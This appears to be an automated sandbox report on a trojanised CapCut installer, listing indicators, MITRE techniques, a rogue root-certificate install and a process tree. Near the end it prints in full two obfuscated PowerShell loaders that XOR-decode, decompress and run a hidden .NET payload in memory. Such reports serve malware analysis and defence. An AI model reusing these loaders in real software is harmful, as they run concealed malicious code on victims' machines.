640a873a9bdc77ddd340a9196fece62dcbfd3e6bdeec787f60d882a59a4ca264

Analysis

max time kernel
141s
max time network
156s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
02/10/2024, 05:23

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

capcut_capcutpc_0_1.2.6_installer.exe
Size

57.9MB
MD5

66efd16409a8d0fb01e18c4bc45620d6
SHA1

ecce01f15f04a5af6cd692041681fbe76acceff3
SHA256

30aa9e4a28393348f245be4d8becf75846e32da0591d6ba4440f4772f9c2c2cf
SHA512

45d3f38b4b000d948af898f97d0e8a56441a4ecb2244eacc0ac79616d653c902e5fffe4ba7ec0ffb425af4328e3d068865f2747eaea7b4bae19ead116aa134cb
SSDEEP

1572864:sXDgU7aTp2fTWYIQklIK+Z280QLzzTmkxyZYfDmI0t:sXDL7aTp2nJMH+Z2tQLzHYZSRy

Score

8^/10

discovery execution

Malware Config

Signatures

Blocklisted process makes network request 2 IoCs

flow	pid	Process
85	2956	powershell.exe
87	2956	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2480	powershell.exe
3064	powershell.exe
2956	powershell.exe

Downloads MZ/PE file

Patched UPX-packed file 1 IoCs

Sample is packed with UPX but required header fields are zeroed out to prevent unpacking with the default UPX tool.

resource	yara_rule
behavioral2/files/0x00070000000236bf-440.dat	patched_upx

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\International\Geo\Nation	CapCut.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\International\Geo\Nation	CapCut.exe

Executes dropped EXE 17 IoCs

pid	Process
2612	CapCut.exe
2188	CapCut.exe
3168	CapCut.exe
2776	CapCut.exe
3588	CapCut.exe
3260	php.exe
800	php.exe
4644	rhc.exe
4744	rhc.exe
3608	php.exe
3536	php.exe
4488	rhc.exe
2788	rhc.exe
3908	php.exe
2188	rhc.exe
3424	php.exe
3360	CapCut.exe

Loads dropped DLL 64 IoCs

pid	Process
3096	capcut_capcutpc_0_1.2.6_installer.exe
3096	capcut_capcutpc_0_1.2.6_installer.exe
3096	capcut_capcutpc_0_1.2.6_installer.exe
3096	capcut_capcutpc_0_1.2.6_installer.exe
3096	capcut_capcutpc_0_1.2.6_installer.exe
3096	capcut_capcutpc_0_1.2.6_installer.exe
3096	capcut_capcutpc_0_1.2.6_installer.exe
2612	CapCut.exe
2188	CapCut.exe
3168	CapCut.exe
2776	CapCut.exe
3168	CapCut.exe
3168	CapCut.exe
3168	CapCut.exe
3588	CapCut.exe
3260	php.exe
3260	php.exe
800	php.exe
800	php.exe
800	php.exe
800	php.exe
800	php.exe
800	php.exe
800	php.exe
800	php.exe
800	php.exe
800	php.exe
800	php.exe
800	php.exe
800	php.exe
800	php.exe
800	php.exe
3536	php.exe
3536	php.exe
3536	php.exe
3536	php.exe
3536	php.exe
3536	php.exe
3536	php.exe
3536	php.exe
3536	php.exe
3536	php.exe
3536	php.exe
3536	php.exe
3536	php.exe
3536	php.exe
3536	php.exe
3608	php.exe
3608	php.exe
3608	php.exe
3608	php.exe
3608	php.exe
3608	php.exe
3608	php.exe
3608	php.exe
3608	php.exe
3608	php.exe
3608	php.exe
3608	php.exe
3608	php.exe
3608	php.exe
3608	php.exe
3908	php.exe
3908	php.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
85	api.ipify.org
84	api.ipify.org

Enumerates processes with tasklist 1 TTPs 1 IoCs

discovery

Process Discovery

T1057

pid	Process
4696	tasklist.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 14 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	find.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rhc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rhc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rhc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rhc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	capcut_capcutpc_0_1.2.6_installer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rhc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe

Modifies system certificate store 2 TTPs 3 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob = 5c000000010000000400000000080000190000000100000010000000a823b4a20180beb460cab955c24d7e21030000000100000014000000b1bc968bd4f49d622aa89a81f2150152a41d829c7e00000001000000080000000000042beb77d5017a000000010000000c000000300a06082b060105050703097f000000010000000c000000300a06082b060105050703091d00000001000000100000006ee7f3b060d10e90a31ba3471b999236140000000100000014000000607b661a450d97ca89502f7d04cd34a8fffcfd4b620000000100000020000000ebd41040e4bb3ec742c9e381d31ef2a41a48b6685c96e7cef3c1df6cd4331c990b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520031000000530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000068000000306606082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050508020206082b0601050507030606082b0601050507030706082b0601050507030906082b0601050507030106082b060105050703080f00000001000000140000005a6d07b6371d966a2fb6ba92828ce5512a49513d0400000001000000100000003e455215095192e1b75d379fb187298a200000000100000079030000308203753082025da003020102020b040000000001154b5ac394300d06092a864886f70d01010505003057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f74204341301e170d3938303930313132303030305a170d3238303132383132303030305a3057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100da0ee6998dcea3e34f8a7efbf18b83256bea481ff12ab0b9951104bdf063d1e26766cf1cddcf1b482bee8d898e9aaf298065abe9c72d12cbab1c4c7007a13d0a30cd158d4ff8ddd48c50151cef50eec42ef7fce952f2917de06dd535308e5e4373f241e9d56ae3b2893a5639386f063c88695b2a4dc5a754b86c89cc9bf93ccae5fd89f5123c927896d6dc746e934461d18dc746b2750e86e8198ad56d6cd5781695a2e9c80a38ebf224134f73549313853a1bbc1e34b58b058cb9778bb1db1f2091ab09536e90ce7b3774b97047912251631679aeb1ae412608c8192bd146aa48d6642ad78334ff2c2ac16c19434a0785e7d37cf62168efeaf2529f7f9390cf0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e04160414607b661a450d97ca89502f7d04cd34a8fffcfd4b300d06092a864886f70d01010505000382010100d673e77c4f76d08dbfecbaa2be34c52832b57cfc6c9c2c2bbd099e53bf6b5eaa1148b6e508a3b3ca3d614dd34609b33ec3a0e363551bf2baefad39e143b938a3e62f8a263befa05056f9c60afd38cdc40b705194979804dfc35f94d515c914419cc45d7564150dff5530ec868fff0def2cb96346f6aafcdfbc69fd2e1248649ae095f0a6ef298f01b115b50c1da5fe692c6924781eb3a71c7162eecac897ac175d8ac2f847866e2ac4563195d06789852bf96ca65d469d0caa82e49951dd70b7db563d61e46ae15cd6f6fe3dde41cc07ae6352bf5353f42be9c7fdb6f7825f85d24118db81b3041cc51fa4806f1520c9de0c880a1dd66655e2fc48c9292669e0	CapCut.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C	CapCut.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob = 0400000001000000100000003e455215095192e1b75d379fb187298a0f00000001000000140000005a6d07b6371d966a2fb6ba92828ce5512a49513d090000000100000068000000306606082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050508020206082b0601050507030606082b0601050507030706082b0601050507030906082b0601050507030106082b06010505070308530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520031000000620000000100000020000000ebd41040e4bb3ec742c9e381d31ef2a41a48b6685c96e7cef3c1df6cd4331c99140000000100000014000000607b661a450d97ca89502f7d04cd34a8fffcfd4b1d00000001000000100000006ee7f3b060d10e90a31ba3471b9992367f000000010000000c000000300a06082b060105050703097a000000010000000c000000300a06082b060105050703097e00000001000000080000000000042beb77d501030000000100000014000000b1bc968bd4f49d622aa89a81f2150152a41d829c190000000100000010000000a823b4a20180beb460cab955c24d7e21200000000100000079030000308203753082025da003020102020b040000000001154b5ac394300d06092a864886f70d01010505003057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f74204341301e170d3938303930313132303030305a170d3238303132383132303030305a3057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100da0ee6998dcea3e34f8a7efbf18b83256bea481ff12ab0b9951104bdf063d1e26766cf1cddcf1b482bee8d898e9aaf298065abe9c72d12cbab1c4c7007a13d0a30cd158d4ff8ddd48c50151cef50eec42ef7fce952f2917de06dd535308e5e4373f241e9d56ae3b2893a5639386f063c88695b2a4dc5a754b86c89cc9bf93ccae5fd89f5123c927896d6dc746e934461d18dc746b2750e86e8198ad56d6cd5781695a2e9c80a38ebf224134f73549313853a1bbc1e34b58b058cb9778bb1db1f2091ab09536e90ce7b3774b97047912251631679aeb1ae412608c8192bd146aa48d6642ad78334ff2c2ac16c19434a0785e7d37cf62168efeaf2529f7f9390cf0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e04160414607b661a450d97ca89502f7d04cd34a8fffcfd4b300d06092a864886f70d01010505000382010100d673e77c4f76d08dbfecbaa2be34c52832b57cfc6c9c2c2bbd099e53bf6b5eaa1148b6e508a3b3ca3d614dd34609b33ec3a0e363551bf2baefad39e143b938a3e62f8a263befa05056f9c60afd38cdc40b705194979804dfc35f94d515c914419cc45d7564150dff5530ec868fff0def2cb96346f6aafcdfbc69fd2e1248649ae095f0a6ef298f01b115b50c1da5fe692c6924781eb3a71c7162eecac897ac175d8ac2f847866e2ac4563195d06789852bf96ca65d469d0caa82e49951dd70b7db563d61e46ae15cd6f6fe3dde41cc07ae6352bf5353f42be9c7fdb6f7825f85d24118db81b3041cc51fa4806f1520c9de0c880a1dd66655e2fc48c9292669e0	CapCut.exe

Suspicious behavior: EnumeratesProcesses 32 IoCs

pid	Process
3096	capcut_capcutpc_0_1.2.6_installer.exe
3096	capcut_capcutpc_0_1.2.6_installer.exe
4696	tasklist.exe
4696	tasklist.exe
2188	CapCut.exe
2188	CapCut.exe
2776	CapCut.exe
2776	CapCut.exe
3588	CapCut.exe
3588	CapCut.exe
3608	php.exe
3608	php.exe
1156	powershell.exe
1156	powershell.exe
1156	powershell.exe
3908	php.exe
3908	php.exe
3064	powershell.exe
3064	powershell.exe
3064	powershell.exe
2956	powershell.exe
2956	powershell.exe
2956	powershell.exe
2480	powershell.exe
2480	powershell.exe
2480	powershell.exe
3424	php.exe
3424	php.exe
3360	CapCut.exe
3360	CapCut.exe
3360	CapCut.exe
3360	CapCut.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4696	tasklist.exe
Token: SeSecurityPrivilege	3096	capcut_capcutpc_0_1.2.6_installer.exe
Token: SeDebugPrivilege	1156	powershell.exe
Token: SeDebugPrivilege	3064	powershell.exe
Token: SeDebugPrivilege	2956	powershell.exe
Token: SeDebugPrivilege	2480	powershell.exe
Token: SeIncreaseQuotaPrivilege	2480	powershell.exe
Token: SeSecurityPrivilege	2480	powershell.exe
Token: SeTakeOwnershipPrivilege	2480	powershell.exe
Token: SeLoadDriverPrivilege	2480	powershell.exe
Token: SeSystemProfilePrivilege	2480	powershell.exe
Token: SeSystemtimePrivilege	2480	powershell.exe
Token: SeProfSingleProcessPrivilege	2480	powershell.exe
Token: SeIncBasePriorityPrivilege	2480	powershell.exe
Token: SeCreatePagefilePrivilege	2480	powershell.exe
Token: SeBackupPrivilege	2480	powershell.exe
Token: SeRestorePrivilege	2480	powershell.exe
Token: SeShutdownPrivilege	2480	powershell.exe
Token: SeDebugPrivilege	2480	powershell.exe
Token: SeSystemEnvironmentPrivilege	2480	powershell.exe
Token: SeRemoteShutdownPrivilege	2480	powershell.exe
Token: SeUndockPrivilege	2480	powershell.exe
Token: SeManageVolumePrivilege	2480	powershell.exe
Token: 33	2480	powershell.exe
Token: 34	2480	powershell.exe
Token: 35	2480	powershell.exe
Token: 36	2480	powershell.exe
Token: SeIncreaseQuotaPrivilege	2480	powershell.exe
Token: SeSecurityPrivilege	2480	powershell.exe
Token: SeTakeOwnershipPrivilege	2480	powershell.exe
Token: SeLoadDriverPrivilege	2480	powershell.exe
Token: SeSystemProfilePrivilege	2480	powershell.exe
Token: SeSystemtimePrivilege	2480	powershell.exe
Token: SeProfSingleProcessPrivilege	2480	powershell.exe
Token: SeIncBasePriorityPrivilege	2480	powershell.exe
Token: SeCreatePagefilePrivilege	2480	powershell.exe
Token: SeBackupPrivilege	2480	powershell.exe
Token: SeRestorePrivilege	2480	powershell.exe
Token: SeShutdownPrivilege	2480	powershell.exe
Token: SeDebugPrivilege	2480	powershell.exe
Token: SeSystemEnvironmentPrivilege	2480	powershell.exe
Token: SeRemoteShutdownPrivilege	2480	powershell.exe
Token: SeUndockPrivilege	2480	powershell.exe
Token: SeManageVolumePrivilege	2480	powershell.exe
Token: 33	2480	powershell.exe
Token: 34	2480	powershell.exe
Token: 35	2480	powershell.exe
Token: 36	2480	powershell.exe
Token: SeIncreaseQuotaPrivilege	2480	powershell.exe
Token: SeSecurityPrivilege	2480	powershell.exe
Token: SeTakeOwnershipPrivilege	2480	powershell.exe
Token: SeLoadDriverPrivilege	2480	powershell.exe
Token: SeSystemProfilePrivilege	2480	powershell.exe
Token: SeSystemtimePrivilege	2480	powershell.exe
Token: SeProfSingleProcessPrivilege	2480	powershell.exe
Token: SeIncBasePriorityPrivilege	2480	powershell.exe
Token: SeCreatePagefilePrivilege	2480	powershell.exe
Token: SeBackupPrivilege	2480	powershell.exe
Token: SeRestorePrivilege	2480	powershell.exe
Token: SeShutdownPrivilege	2480	powershell.exe
Token: SeDebugPrivilege	2480	powershell.exe
Token: SeSystemEnvironmentPrivilege	2480	powershell.exe
Token: SeRemoteShutdownPrivilege	2480	powershell.exe
Token: SeUndockPrivilege	2480	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3096 wrote to memory of 3604	3096	capcut_capcutpc_0_1.2.6_installer.exe	89
PID 3096 wrote to memory of 3604	3096	capcut_capcutpc_0_1.2.6_installer.exe	89
PID 3096 wrote to memory of 3604	3096	capcut_capcutpc_0_1.2.6_installer.exe	89
PID 3604 wrote to memory of 4696	3604	cmd.exe	91
PID 3604 wrote to memory of 4696	3604	cmd.exe	91
PID 3604 wrote to memory of 4696	3604	cmd.exe	91
PID 3604 wrote to memory of 2184	3604	cmd.exe	92
PID 3604 wrote to memory of 2184	3604	cmd.exe	92
PID 3604 wrote to memory of 2184	3604	cmd.exe	92
PID 2612 wrote to memory of 2188	2612	CapCut.exe	98
PID 2612 wrote to memory of 2188	2612	CapCut.exe	98
PID 2612 wrote to memory of 3168	2612	CapCut.exe	99
PID 2612 wrote to memory of 3168	2612	CapCut.exe	99
PID 2612 wrote to memory of 3168	2612	CapCut.exe	99
PID 2612 wrote to memory of 3168	2612	CapCut.exe	99
PID 2612 wrote to memory of 3168	2612	CapCut.exe	99
PID 2612 wrote to memory of 3168	2612	CapCut.exe	99
PID 2612 wrote to memory of 3168	2612	CapCut.exe	99
PID 2612 wrote to memory of 3168	2612	CapCut.exe	99
PID 2612 wrote to memory of 3168	2612	CapCut.exe	99
PID 2612 wrote to memory of 3168	2612	CapCut.exe	99
PID 2612 wrote to memory of 3168	2612	CapCut.exe	99
PID 2612 wrote to memory of 3168	2612	CapCut.exe	99
PID 2612 wrote to memory of 3168	2612	CapCut.exe	99
PID 2612 wrote to memory of 3168	2612	CapCut.exe	99
PID 2612 wrote to memory of 3168	2612	CapCut.exe	99
PID 2612 wrote to memory of 3168	2612	CapCut.exe	99
PID 2612 wrote to memory of 3168	2612	CapCut.exe	99
PID 2612 wrote to memory of 3168	2612	CapCut.exe	99
PID 2612 wrote to memory of 3168	2612	CapCut.exe	99
PID 2612 wrote to memory of 3168	2612	CapCut.exe	99
PID 2612 wrote to memory of 3168	2612	CapCut.exe	99
PID 2612 wrote to memory of 3168	2612	CapCut.exe	99
PID 2612 wrote to memory of 3168	2612	CapCut.exe	99
PID 2612 wrote to memory of 3168	2612	CapCut.exe	99
PID 2612 wrote to memory of 3168	2612	CapCut.exe	99
PID 2612 wrote to memory of 3168	2612	CapCut.exe	99
PID 2612 wrote to memory of 3168	2612	CapCut.exe	99
PID 2612 wrote to memory of 3168	2612	CapCut.exe	99
PID 2612 wrote to memory of 3168	2612	CapCut.exe	99
PID 2612 wrote to memory of 3168	2612	CapCut.exe	99
PID 2612 wrote to memory of 3168	2612	CapCut.exe	99
PID 2612 wrote to memory of 3168	2612	CapCut.exe	99
PID 2612 wrote to memory of 3168	2612	CapCut.exe	99
PID 2612 wrote to memory of 3168	2612	CapCut.exe	99
PID 2612 wrote to memory of 3168	2612	CapCut.exe	99
PID 2612 wrote to memory of 3168	2612	CapCut.exe	99
PID 2612 wrote to memory of 3168	2612	CapCut.exe	99
PID 2612 wrote to memory of 3168	2612	CapCut.exe	99
PID 2612 wrote to memory of 3168	2612	CapCut.exe	99
PID 2612 wrote to memory of 3168	2612	CapCut.exe	99
PID 2612 wrote to memory of 2776	2612	CapCut.exe	100
PID 2612 wrote to memory of 2776	2612	CapCut.exe	100
PID 2612 wrote to memory of 3588	2612	CapCut.exe	102
PID 2612 wrote to memory of 3588	2612	CapCut.exe	102
PID 2188 wrote to memory of 3260	2188	CapCut.exe	111
PID 2188 wrote to memory of 3260	2188	CapCut.exe	111
PID 2188 wrote to memory of 800	2188	CapCut.exe	113
PID 2188 wrote to memory of 800	2188	CapCut.exe	113
PID 2188 wrote to memory of 4644	2188	CapCut.exe	115
PID 2188 wrote to memory of 4644	2188	CapCut.exe	115
PID 2188 wrote to memory of 4644	2188	CapCut.exe	115
PID 2188 wrote to memory of 4744	2188	CapCut.exe	116
PID 2188 wrote to memory of 4744	2188	CapCut.exe	116

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\capcut_capcutpc_0_1.2.6_installer.exe
"C:\Users\Admin\AppData\Local\Temp\capcut_capcutpc_0_1.2.6_installer.exe"
1⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3096
- C:\Windows\SysWOW64\cmd.exe
  cmd /c tasklist /FI "USERNAME eq %USERNAME%" /FI "IMAGENAME eq CapCut.exe" | find "CapCut.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:3604
- - C:\Windows\SysWOW64\tasklist.exe
    tasklist /FI "USERNAME eq Admin" /FI "IMAGENAME eq CapCut.exe"
    3⤵
    - Enumerates processes with tasklist
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4696
- - C:\Windows\SysWOW64\find.exe
    find "CapCut.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2184

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=4008,i,15336851255456239337,16379811035920490645,262144 --variations-seed-version --mojo-platform-channel-handle=928 /prefetch:8
1⤵
PID:1072

C:\Users\Admin\AppData\Local\Programs\capcut\CapCut.exe
"C:\Users\Admin\AppData\Local\Programs\capcut\CapCut.exe"
1⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
PID:2612
- C:\Users\Admin\AppData\Local\Programs\capcut\CapCut.exe
  C:\Users\Admin\AppData\Local\Programs\capcut\CapCut.exe C:\Users\Admin\AppData\Local\Programs\capcut\resources\app.asar\dist\temp\temp
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:2188
- - C:\Users\Admin\AppData\Roaming\dcw_global\app\php.exe
    C:\Users\Admin\AppData\Roaming\dcw_global\app\php.exe -v
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:3260
- - C:\Users\Admin\AppData\Roaming\dcw_global\app\php.exe
    C:\Users\Admin\AppData\Roaming\dcw_global\app\php.exe -v
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:800
- - C:\Users\Admin\AppData\Roaming\dcw_global\app\rhc.exe
    C:\Users\Admin\AppData\Roaming\dcw_global\app\rhc.exe C:\Users\Admin\AppData\Roaming\dcw_global\app\php.exe C:\Users\Admin\AppData\Roaming\dcw_global\app\include.php
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:4644
  - - C:\Users\Admin\AppData\Roaming\dcw_global\app\php.exe
      C:\Users\Admin\AppData\Roaming\dcw_global\app\php.exe C:\Users\Admin\AppData\Roaming\dcw_global\app\include.php
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:3536
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "PowerShell -c "Get-Date -Format 'yyyy-MM-dd HH:mm:ss'""
        5⤵
        
        PID:3164
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell -c "Get-Date -Format 'yyyy-MM-dd HH:mm:ss'"
        6⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1156
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c ""C:\Users\Admin\AppData\Roaming\dcw_global\app\rhc.exe" "C:\ProgramData\install.bat""
        5⤵
        
        PID:4088
      - C:\Users\Admin\AppData\Roaming\dcw_global\app\rhc.exe
        
        "C:\Users\Admin\AppData\Roaming\dcw_global\app\rhc.exe" "C:\ProgramData\install.bat"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:2788
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\ProgramData\install.bat""
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:3132
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\ProgramData\install.bat"
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:228
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -c $taHD='C:\ProgramData\install.bat';$NtIb='FHirslHirsusHirshHirs'.Replace('Hirs', '');$ObcK='WHirsrHirsiHirstHirse'.Replace('Hirs', '');$ArEi='RHirseHirsaHirsd'.Replace('Hirs', '');$JrMk='LHirsoHirsaHirsd'.Replace('Hirs', '');$zoKG='EHirsnHirstHirsryHirsPoHirsinHirst'.Replace('Hirs', '');$ddJZ='IHirsnHirsvoHirskHirse'.Replace('Hirs', '');$UHEF='FrHirsoHirsmBHirsasHirse6Hirs4HirsSHirstrHirsinHirsg'.Replace('Hirs', '');$SPyy='MHirsaHirsinHirsMoHirsdHirsuHirsle'.Replace('Hirs', '');$VaHf='GHirseHirstHirsCuHirsrrHirsenHirstPHirsroHirsceHirsss'.Replace('Hirs', '');$PDYZ='ElHirsemHirsenHirstAHirst'.Replace('Hirs', '');$Retn='ReHirsadHirsLiHirsnHirseHirss'.Replace('Hirs', '');$Hdbx='ChHirsaHirsnHirsgeHirsExHirstHirseHirsnsHirsiHirsoHirsnHirs'.Replace('Hirs', '');$ublZB=[System.Linq.Enumerable]::$PDYZ([System.IO.File]::$Retn($taHD), 1);$YXXGq=$ublZB.Substring(2);function cSUex($kGFsz){$SjAZa=New-Object System.IO.MemoryStream(,$kGFsz);$zIanR=New-Object System.IO.MemoryStream;$vRvnd=New-Object System.IO.Compression.GZipStream($SjAZa,[IO.Compression.CompressionMode]::Decompress);$hRgEv = New-Object System.IO.BinaryWriter($zIanR);$bRTaW = New-Object byte[](1024);while($true){$FgteA = $vRvnd.$ArEi($bRTaW,0,1024);if($FgteA -le 0){break;}$hRgEv.$ObcK($bRTaW,0,$FgteA);$hRgEv.$NtIb();}$vRvnd.Dispose();$SjAZa.Dispose();$hRgEv.Close();$zIanR.Dispose();$zIanR.ToArray();}function JeGso($kGFsz){$PzChi=[System.Convert]::$UHEF('7hl8HDjB6KYIKdxWsK/Yv3pcVj44gbOTziIiPQGMP4k=');For ($i=0; $i -lt $kGFsz.Length; $i++){$ix = $i % $PzChi.Length;$kGFsz[$i] = $kGFsz[$i] -bxor $PzChi[$ix];}$kGFsz;}$YjPOO = cSUex(JeGso([System.Convert]::$UHEF($YXXGq)));[System.Reflection.Assembly]::$JrMk([byte[]]$YjPOO).$zoKG.$ddJZ($null,$null);
        9⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3064
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -c "function cSUex($kGFsz){$SjAZa=New-Object System.IO.MemoryStream(,$kGFsz);$zIanR=New-Object System.IO.MemoryStream;$vRvnd=New-Object System.IO.Compression.GZipStream($SjAZa,[IO.Compression.CompressionMode]::Decompress);$hRgEv = New-Object System.IO.BinaryWriter($zIanR);$bRTaW = New-Object byte[](1024);while($true){$FgteA = $vRvnd.Read($bRTaW,0,1024);if($FgteA -le 0){break;}$hRgEv.Write($bRTaW,0,$FgteA);$hRgEv.Flush();}$vRvnd.Dispose();$SjAZa.Dispose();$hRgEv.Close();$zIanR.Dispose();$zIanR.ToArray();}function JeGso($kGFsz){$PzChi=[System.Convert]::FromBase64String('hkguTzSCb75g7sJ9ChMcmAOPpeBL9ZJy/tejnoCjT+E=');For ($i=0; $i -lt $kGFsz.Length; $i++){$ix = $i % $PzChi.Length;$kGFsz[$i] = $kGFsz[$i] -bxor $PzChi[$ix];}$kGFsz;}$YjPOO = cSUex(JeGso([System.Convert]::FromBase64String([System.IO.File]::ReadAllText('C:\Users\Admin\AppData\Local\Pac\data2.txt'))));[System.Reflection.Assembly]::Load([byte[]]$YjPOO).EntryPoint.Invoke($null,$null);"
        10⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2956
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
